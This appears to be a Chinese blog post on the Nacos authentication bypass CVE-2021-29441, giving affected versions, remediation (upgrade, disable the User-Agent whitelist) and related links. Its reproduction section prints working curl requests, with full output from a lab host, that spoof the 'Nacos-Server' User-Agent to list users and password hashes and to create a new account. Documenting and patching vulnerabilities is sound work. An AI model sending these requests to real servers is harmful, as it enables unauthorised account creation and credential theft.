Nacos 存在认证绕过漏洞(CVE-2021-29441)

最新推荐文章于 2024-04-14 16:00:00 发布
最新推荐文章于 2024-04-14 16:00:00 发布
阅读量1.9k 收藏
点赞数 1
分类专栏: 安全 文章标签: java 分布式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fenggedainifei/article/details/131038173
版权
Nacos是一个由Alibaba开发的服务发现和配置管理平台,存在User-Agent认证绕过问题,允许攻击者在特定条件下调用任意API。漏洞影响Nacos-common版本低于1.4.1。复现该漏洞可通过设置User-Agent为Nacos-Server绕过认证。修复方案是将Nacos-common升级到1.4.1以上并关闭User-Agent白名单设置。
摘要由CSDN通过智能技术生成

Nacos 存在认证绕过漏洞(CVE-2021-29441)

漏洞描述:

nacos是中国阿里巴巴(Alibaba)的一个动态服务发现、配置和服务管理平台。该软件支持基于 DNS 和基于 RPC 的服务发现,可提供提供实时健康检查,阻止服务向不健康的主机或服务实例发送请求等功能。

Nacos 1.4.1对于User-Agent绕过安全漏洞的serverIdentity key-value修复机制存在实现缺陷,当用户通过/nacos/v1/auth/users/?username=test&password=test访问时,users后的/会导致鉴权被绕过,攻击者仍可调用任意API,进行用户创建、查看等操作。

user-agent为"Nacos-Server"时跳过认证

影响范围:

com.alibaba.nacos:nacos-common@(-∞, 1.4.1)

复现方式/漏洞检测

请求接口
curl --location 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' \
--header 'User-Agent: Nacos-Server'
请求数据与返回数据
[root@localhost ~]# curl -iv --location 'http://172.16.5.125:31500/nacos/v1/auth/users?pageNo=1&pageSize=9' --header 'User-Agent: Nacos-Server'
* About to connect() to 172.16.5.125 port 31500 (#0)
*   Trying 172.16.5.125...
* Connected to 172.16.5.125 (172.16.5.125) port 31500 (#0)
> GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
> Host: 172.16.5.125:31500
> Accept: */*
> User-Agent: Nacos-Server
> 
< HTTP/1.1 200 
HTTP/1.1 200 
< Content-Type: application/json;charset=UTF-8
Content-Type: application/json;charset=UTF-8
< Transfer-Encoding: chunked
Transfer-Encoding: chunked
< Date: Thu, 30 Mar 2023 08:06:32 GMT
Date: Thu, 30 Mar 2023 08:06:32 GMT

< 
* Connection #0 to host 172.16.5.125 left intact
{"totalCount":2,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"}]}
请求接口
curl --location --request POST 'http://127.0.0.1:8848/nacos/v1/auth/users?username=crow&password=crow' \
--header 'User-Agent: Nacos-Server'
请求数据与返回数据
[root@localhost ~]# curl -iv --location --request POST 'http://172.16.5.125:31500/nacos/v1/auth/users?username=crow&password=crow' --header 'User-Agent: Nacos-Server'
* About to connect() to 172.16.5.125 port 31500 (#0)
*   Trying 172.16.5.125...
* Connected to 172.16.5.125 (172.16.5.125) port 31500 (#0)
> POST /nacos/v1/auth/users?username=crow&password=crow HTTP/1.1
> Host: 172.16.5.125:31500
> Accept: */*
> User-Agent: Nacos-Server
> 
< HTTP/1.1 200 
HTTP/1.1 200 
< Content-Type: application/json;charset=UTF-8
Content-Type: application/json;charset=UTF-8
< Transfer-Encoding: chunked
Transfer-Encoding: chunked
< Date: Thu, 30 Mar 2023 08:08:27 GMT
Date: Thu, 30 Mar 2023 08:08:27 GMT

< 
* Connection #0 to host 172.16.5.125 left intact
{"code":200,"message":"create user ok!","data":null}

修复方案:

将组件 com.alibaba.nacos:nacos-common 升级至 1.4.1 及以上版本

修改nacos配置

# 关闭白名单  设置为true时, 默认user-agent为"Nacos-Server"会跳过认证
nacos.core.auth.enable.userAgentAuthWhite=false

参考链接:

https://www.oscs1024.com/hd/MPS-2021-5683

https://nvd.nist.gov/vuln/detail/CVE-2021-29441

https://github.com/alibaba/nacos/issues/4701

在这里插入图片描述

北方的孤夜
关注
专栏目录
针对Nacos漏洞猎杀的各种骚姿势
2301_80115097的博客
08-14 1106
这次给师傅们分析的是Nacos相关漏洞挖掘的骚技巧,主要是给师傅们打下nday,让师傅们能够从零基础的小白也可以上手打Nacos的nday(主要给小白看的,大佬勿喷)。然后下面主要介绍了NacosExploitGUI自动化工具的使用,以及使用这个工具打nday的手法,以及要是批量漏洞url怎么扫描利用,总的来讲,下面的漏洞案例复现还是蛮详细的。
解决Alibaba Nacos 权限认证绕过漏洞 (CVE- - 2021- - 29441)亲测有效
majunssz的博客
04-22 1万+
解决Alibaba Nacos 权限认证绕过漏洞 (CVE- - 2021- - 29441)亲测有效 2.可以通过外网随意添加nacos用户名及密码
Nacos认证绕过漏洞CVE-2021-29441
tpaer的博客
12-16 2041
复现Nacos认证绕过漏洞,导致未授权的任意访问。
nacos未授权-CVE-2021-29441复现
crowsec
07-21 7866
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。 该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单。。。...
Alibaba Nacos权限认证绕过漏洞[CVE-2021-29441]
m0_54323635的博客
08-31 1183
Alibaba Nacos是阿里巴巴的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。 该漏洞Nacos在进行认证授权操作时,会先判断user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。
Nacos权限绕过漏洞(CVE-2021-29441)复现
最新发布
2301_76437855的博客
04-14 3467
CVE-2021-29441Nacos 组件中的一个权限验证漏洞,该漏洞允许未授权的攻击者绕过认证,进而获取服务器的敏感信息或执行未授权操作。把请求头中GET请求改成POST,User-Agent中的参数换成Nacos-Server,然后我添加了一个用户nbacba,密码一样。我们可以看见有一个叫nacos的用户,密码通过盐加密方法加密(nacos的初始用户名和密码都为nacos,有时候可以碰碰运气)升级 Nacos 到安全版本:Nacos 官方已发布修复此漏洞的版本。返回值为200,可以正常访问。
【渗透实战】Nacos未授权访问(CVE-2021-29441
Nafia的博客
02-20 4265
Nacos未授权访问漏洞挖掘记录
Nacos 认证绕过漏洞CVE-2021-29441
gaomei2009的专栏
06-20 656
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。
vulhub靶场-[CVE-2021-29441]Alibaba Nacos权限认证绕过漏洞
ccccai22的博客
06-28 631
vulhub靶场-[CVE-2021-29441]Alibaba Nacos权限认证绕过漏洞
Ruoyi-Cloud-Plus_Nacos配置服务漏洞CVE-2021-29441_官方解决方法以及_修改源码解决---SpringCloud工作笔记199
添柴程序猿的专栏
02-02 661
Nacos是Alibaba的一个动态服务发现、配置和服务管理平台。修改方法是:在Nacos项目的application.properties文件中,添加一下的配置。这个时候:再去其他服务中修改配置文件,主要是nacos的注册部分,除了添加注册地址,还有,加上。配置以后再启动,然后再去,访问之前的api就会显示403,没问题了.这个时候,启动其他服务以后,就会出现注册不到nacos的情况。拦截一下地址,当访问地址是这个地址的时候,直接,拦截器中返回。上面的情况.会通过这个接口就可以添加用户了。
nacos权限绕过漏洞(CVE-2021-29441)
10-26
nacos权限绕过漏洞(CVE-2021-29441)是指在nacos进行认证授权操作时,会判断请求的user-agent是否为"Nacos-Server",如果是的话则不进行任何认证。攻击者可以通过伪造请求头中的user-agent来绕过认证,获取到用户名...
Nacos漏洞修复】Nacos未授权访问漏洞(CVE-2021-29441)
m0_52985087的博客
03-20 8295
但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/console/server/state'
Nacos未授权访问漏洞CVE-2021-29441
Bird&Bird
03-11 1万+
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。 该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-S
nacos权限绕过漏洞(CVE-2021-29441)修复
热门推荐
CSDNHmCxy的博客
09-16 2万+
漏扫出服务器的nacos1.2.1版本存在权限绕过漏洞(CVE-2021-29441)漏洞,给出的建议是升级到最新版本,后面去nacos官网当时最新版本是2.0.3,果断换成了当时最新的再让安全人员漏扫发现还是存在,明明官网已经说2.0.0以上版本已经修复了,怎么还是被扫到呢?通过网上翻看资料得到如下解决办法: 1、修改 nacos的application.properties配置文件,开启服务身份识别功能 ### 开启鉴权 nacos.core.auth.enabled=true ### 关闭使用use
Nacos 未授权访问(CVE-2021-29441)
m0_62207170的博客
08-30 1068
Nacos 未授权访问(CVE-2021-29441)
NACOS漏洞问题及修复(CVE-2021-29441)
Hoopy_Hoopy的博客
09-14 1万+
目录 1.漏洞相关问题 2.场景复现 2.1访问用户列表界面 2.2添加新用户 2.3再次查看用户列表 3.nacos升级 4.代码升级 1.漏洞相关问题 漏洞相关地址 CVE-2021-29441 - Nacos is a platform designed for dynamic service discovery and configuration and service management. - CVE-Searchhttps://cve.circl.lu/cve/CVE-20
[ vulhub漏洞复现篇 ] 阿里巴巴Nacos身份验证绕过(nacos未授权)(CVE-2021-29441)
qq_51577576的博客
11-27 1408
[ vulhub漏洞复现篇 ] 阿里巴巴Nacos身份验证绕过(nacos未授权)(CVE-2021-29441) 该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。
修复nacos漏洞问题SQL注入CNVD-2020-67618、未授权访问CVE-2021-29441
kaopuzong的博客
02-06 2736
修复nacos漏洞问题:漏洞1:SQL注入CNVD-2020-67618 漏洞2:未授权访问CVE-2021-29441 漏洞3:token.secret.key默认配置QVD-2023-6271 漏洞4:Jraft Hessian反序列化CNVD-2023-45001
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

北方的孤夜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值